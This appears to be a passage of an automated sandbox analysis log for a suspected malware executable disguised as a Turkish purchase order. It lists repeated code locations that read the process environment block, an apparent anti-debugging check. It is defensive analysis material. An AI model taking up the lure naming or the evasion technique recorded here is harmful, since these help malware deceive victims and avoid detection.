Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196E1D0 mov eax, dword ptr fs:[00000030h] 3_2_0196E1D0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196E1D0 mov eax, dword ptr fs:[00000030h] 3_2_0196E1D0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B61C3 mov eax, dword ptr fs:[00000030h] 3_2_019B61C3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B61C3 mov eax, dword ptr fs:[00000030h] 3_2_019B61C3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019201F8 mov eax, dword ptr fs:[00000030h] 3_2_019201F8
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C61E5 mov eax, dword ptr fs:[00000030h] 3_2_019C61E5
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199A118 mov ecx, dword ptr fs:[00000030h] 3_2_0199A118
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199A118 mov eax, dword ptr fs:[00000030h] 3_2_0199A118
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199A118 mov eax, dword ptr fs:[00000030h] 3_2_0199A118
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199A118 mov eax, dword ptr fs:[00000030h] 3_2_0199A118
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B0115 mov eax, dword ptr fs:[00000030h] 3_2_019B0115
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199E10E mov eax, dword ptr fs:[00000030h] 3_2_0199E10E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199E10E mov ecx, dword ptr fs:[00000030h] 3_2_0199E10E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199E10E mov eax, dword ptr fs:[00000030h] 3_2_0199E10E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199E10E mov eax, dword ptr fs:[00000030h] 3_2_0199E10E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199E10E mov ecx, dword ptr fs:[00000030h] 3_2_0199E10E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199E10E mov eax, dword ptr fs:[00000030h] 3_2_0199E10E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199E10E mov eax, dword ptr fs:[00000030h] 3_2_0199E10E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199E10E mov ecx, dword ptr fs:[00000030h] 3_2_0199E10E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199E10E mov eax, dword ptr fs:[00000030h] 3_2_0199E10E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199E10E mov ecx, dword ptr fs:[00000030h] 3_2_0199E10E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01920124 mov eax, dword ptr fs:[00000030h] 3_2_01920124
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01988158 mov eax, dword ptr fs:[00000030h] 3_2_01988158
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EC156 mov eax, dword ptr fs:[00000030h] 3_2_018EC156
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F6154 mov eax, dword ptr fs:[00000030h] 3_2_018F6154
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F6154 mov eax, dword ptr fs:[00000030h] 3_2_018F6154
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01984144 mov eax, dword ptr fs:[00000030h] 3_2_01984144
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01984144 mov eax, dword ptr fs:[00000030h] 3_2_01984144
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01984144 mov ecx, dword ptr fs:[00000030h] 3_2_01984144
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01984144 mov eax, dword ptr fs:[00000030h] 3_2_01984144
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01984144 mov eax, dword ptr fs:[00000030h] 3_2_01984144
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C4164 mov eax, dword ptr fs:[00000030h] 3_2_019C4164
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C4164 mov eax, dword ptr fs:[00000030h] 3_2_019C4164
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F208A mov eax, dword ptr fs:[00000030h] 3_2_018F208A
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B60B8 mov eax, dword ptr fs:[00000030h] 3_2_019B60B8
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B60B8 mov ecx, dword ptr fs:[00000030h] 3_2_019B60B8
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018E80A0 mov eax, dword ptr fs:[00000030h] 3_2_018E80A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019880A8 mov eax, dword ptr fs:[00000030h] 3_2_019880A8
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019720DE mov eax, dword ptr fs:[00000030h] 3_2_019720DE
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019320F0 mov ecx, dword ptr fs:[00000030h] 3_2_019320F0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F80E9 mov eax, dword ptr fs:[00000030h] 3_2_018F80E9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EA0E3 mov ecx, dword ptr fs:[00000030h] 3_2_018EA0E3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019760E0 mov eax, dword ptr fs:[00000030h] 3_2_019760E0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EC0F0 mov eax, dword ptr fs:[00000030h] 3_2_018EC0F0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190E016 mov eax, dword ptr fs:[00000030h] 3_2_0190E016
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190E016 mov eax, dword ptr fs:[00000030h] 3_2_0190E016
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190E016 mov eax, dword ptr fs:[00000030h] 3_2_0190E016
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190E016 mov eax, dword ptr fs:[00000030h] 3_2_0190E016
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01974000 mov ecx, dword ptr fs:[00000030h] 3_2_01974000
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01992000 mov eax, dword ptr fs:[00000030h] 3_2_01992000
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01992000 mov eax, dword ptr fs:[00000030h] 3_2_01992000
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01992000 mov eax, dword ptr fs:[00000030h] 3_2_01992000
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01992000 mov eax, dword ptr fs:[00000030h] 3_2_01992000
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01992000 mov eax, dword ptr fs:[00000030h] 3_2_01992000
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01992000 mov eax, dword ptr fs:[00000030h] 3_2_01992000
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01992000 mov eax, dword ptr fs:[00000030h] 3_2_01992000
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01992000 mov eax, dword ptr fs:[00000030h] 3_2_01992000
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01986030 mov eax, dword ptr fs:[00000030h] 3_2_01986030
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EA020 mov eax, dword ptr fs:[00000030h] 3_2_018EA020
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EC020 mov eax, dword ptr fs:[00000030h] 3_2_018EC020
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01976050 mov eax, dword ptr fs:[00000030h] 3_2_01976050
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F2050 mov eax, dword ptr fs:[00000030h] 3_2_018F2050
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191C073 mov eax, dword ptr fs:[00000030h] 3_2_0191C073
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EE388 mov eax, dword ptr fs:[00000030h] 3_2_018EE388
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EE388 mov eax, dword ptr fs:[00000030h] 3_2_018EE388
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EE388 mov eax, dword ptr fs:[00000030h] 3_2_018EE388
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018E8397 mov eax, dword ptr fs:[00000030h] 3_2_018E8397
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018E8397 mov eax, dword ptr fs:[00000030h] 3_2_018E8397
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018E8397 mov eax, dword ptr fs:[00000030h] 3_2_018E8397
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191438F mov eax, dword ptr fs:[00000030h] 3_2_0191438F
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191438F mov eax, dword ptr fs:[00000030h] 3_2_0191438F
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199E3DB mov eax, dword ptr fs:[00000030h] 3_2_0199E3DB
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199E3DB mov eax, dword ptr fs:[00000030h] 3_2_0199E3DB
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199E3DB mov ecx, dword ptr fs:[00000030h] 3_2_0199E3DB
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199E3DB mov eax, dword ptr fs:[00000030h] 3_2_0199E3DB
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019943D4 mov eax, dword ptr fs:[00000030h] 3_2_019943D4
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019943D4 mov eax, dword ptr fs:[00000030h] 3_2_019943D4
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h] 3_2_018FA3C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h] 3_2_018FA3C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h] 3_2_018FA3C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h] 3_2_018FA3C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h] 3_2_018FA3C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h] 3_2_018FA3C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F83C0 mov eax, dword ptr fs:[00000030h] 3_2_018F83C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F83C0 mov eax, dword ptr fs:[00000030h] 3_2_018F83C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F83C0 mov eax, dword ptr fs:[00000030h] 3_2_018F83C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F83C0 mov eax, dword ptr fs:[00000030h] 3_2_018F83C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019AC3CD mov eax, dword ptr fs:[00000030h] 3_2_019AC3CD
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019763C0 mov eax, dword ptr fs:[00000030h] 3_2_019763C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190E3F0 mov eax, dword ptr fs:[00000030h] 3_2_0190E3F0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190E3F0 mov eax, dword ptr fs:[00000030h] 3_2_0190E3F0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190E3F0 mov eax, dword ptr fs:[00000030h] 3_2_0190E3F0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019263FF mov eax, dword ptr fs:[00000030h] 3_2_019263FF
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h] 3_2_019003E9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h] 3_2_019003E9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h] 3_2_019003E9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h] 3_2_019003E9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h] 3_2_019003E9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h] 3_2_019003E9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h] 3_2_019003E9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h] 3_2_019003E9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01910310 mov ecx, dword ptr fs:[00000030h] 3_2_01910310
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192A30B mov eax, dword ptr fs:[00000030h] 3_2_0192A30B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192A30B mov eax, dword ptr fs:[00000030h] 3_2_0192A30B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192A30B mov eax, dword ptr fs:[00000030h] 3_2_0192A30B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EC310 mov ecx, dword ptr fs:[00000030h] 3_2_018EC310
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C8324 mov eax, dword ptr fs:[00000030h] 3_2_019C8324
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C8324 mov ecx, dword ptr fs:[00000030h] 3_2_019C8324
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C8324 mov eax, dword ptr fs:[00000030h] 3_2_019C8324
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C8324 mov eax, dword ptr fs:[00000030h] 3_2_019C8324
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BA352 mov eax, dword ptr fs:[00000030h] 3_2_019BA352
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01998350 mov ecx, dword ptr fs:[00000030h] 3_2_01998350
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197035C mov eax, dword ptr fs:[00000030h] 3_2_0197035C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197035C mov eax, dword ptr fs:[00000030h] 3_2_0197035C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197035C mov eax, dword ptr fs:[00000030h] 3_2_0197035C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197035C mov ecx, dword ptr fs:[00000030h] 3_2_0197035C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197035C mov eax, dword ptr fs:[00000030h] 3_2_0197035C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197035C mov eax, dword ptr fs:[00000030h] 3_2_0197035C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C634F mov eax, dword ptr fs:[00000030h] 3_2_019C634F
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01972349 mov eax, dword ptr fs:[00000030h] 3_2_01972349
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01972349 mov eax, dword ptr fs:[00000030h] 3_2_01972349
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01972349 mov eax, dword ptr fs:[00000030h] 3_2_01972349
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01972349 mov eax, dword ptr fs:[00000030h] 3_2_01972349
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01972349 mov eax, dword ptr fs:[00000030h] 3_2_01972349
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01972349 mov eax, dword ptr fs:[00000030h] 3_2_01972349
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01972349 mov eax, dword ptr fs:[00000030h] 3_2_01972349
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01972349 mov eax, dword ptr fs:[00000030h] 3_2_01972349
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01972349 mov eax, dword ptr fs:[00000030h] 3_2_01972349
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01972349 mov eax, dword ptr fs:[00000030h] 3_2_01972349
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01972349 mov eax, dword ptr fs:[00000030h] 3_2_01972349
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01972349 mov eax, dword ptr fs:[00000030h] 3_2_01972349
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01972349 mov eax, dword ptr fs:[00000030h] 3_2_01972349
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01972349 mov eax, dword ptr fs:[00000030h] 3_2_01972349
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01972349 mov eax, dword ptr fs:[00000030h] 3_2_01972349
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199437C mov eax, dword ptr fs:[00000030h] 3_2_0199437C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01970283 mov eax, dword ptr fs:[00000030h] 3_2_01970283
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01970283 mov eax, dword ptr fs:[00000030h] 3_2_01970283
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01970283 mov eax, dword ptr fs:[00000030h] 3_2_01970283
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192E284 mov eax, dword ptr fs:[00000030h] 3_2_0192E284
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192E284 mov eax, dword ptr fs:[00000030h] 3_2_0192E284
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019002A0 mov eax, dword ptr fs:[00000030h] 3_2_019002A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019002A0 mov eax, dword ptr fs:[00000030h] 3_2_019002A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019862A0 mov eax, dword ptr fs:[00000030h] 3_2_019862A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019862A0 mov ecx, dword ptr fs:[00000030h] 3_2_019862A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019862A0 mov eax, dword ptr fs:[00000030h] 3_2_019862A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019862A0 mov eax, dword ptr fs:[00000030h] 3_2_019862A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019862A0 mov eax, dword ptr fs:[00000030h] 3_2_019862A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019862A0 mov eax, dword ptr fs:[00000030h] 3_2_019862A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C62D6 mov eax, dword ptr fs:[00000030h] 3_2_019C62D6
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA2C3 mov eax, dword ptr fs:[00000030h] 3_2_018FA2C3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA2C3 mov eax, dword ptr fs:[00000030h] 3_2_018FA2C3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA2C3 mov eax, dword ptr fs:[00000030h] 3_2_018FA2C3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA2C3 mov eax, dword ptr fs:[00000030h] 3_2_018FA2C3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FA2C3 mov eax, dword ptr fs:[00000030h] 3_2_018FA2C3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019002E1 mov eax, dword ptr fs:[00000030h] 3_2_019002E1
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019002E1 mov eax, dword ptr fs:[00000030h] 3_2_019002E1
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019002E1 mov eax, dword ptr fs:[00000030h] 3_2_019002E1
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018E823B mov eax, dword ptr fs:[00000030h] 3_2_018E823B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C625D mov eax, dword ptr fs:[00000030h] 3_2_019C625D
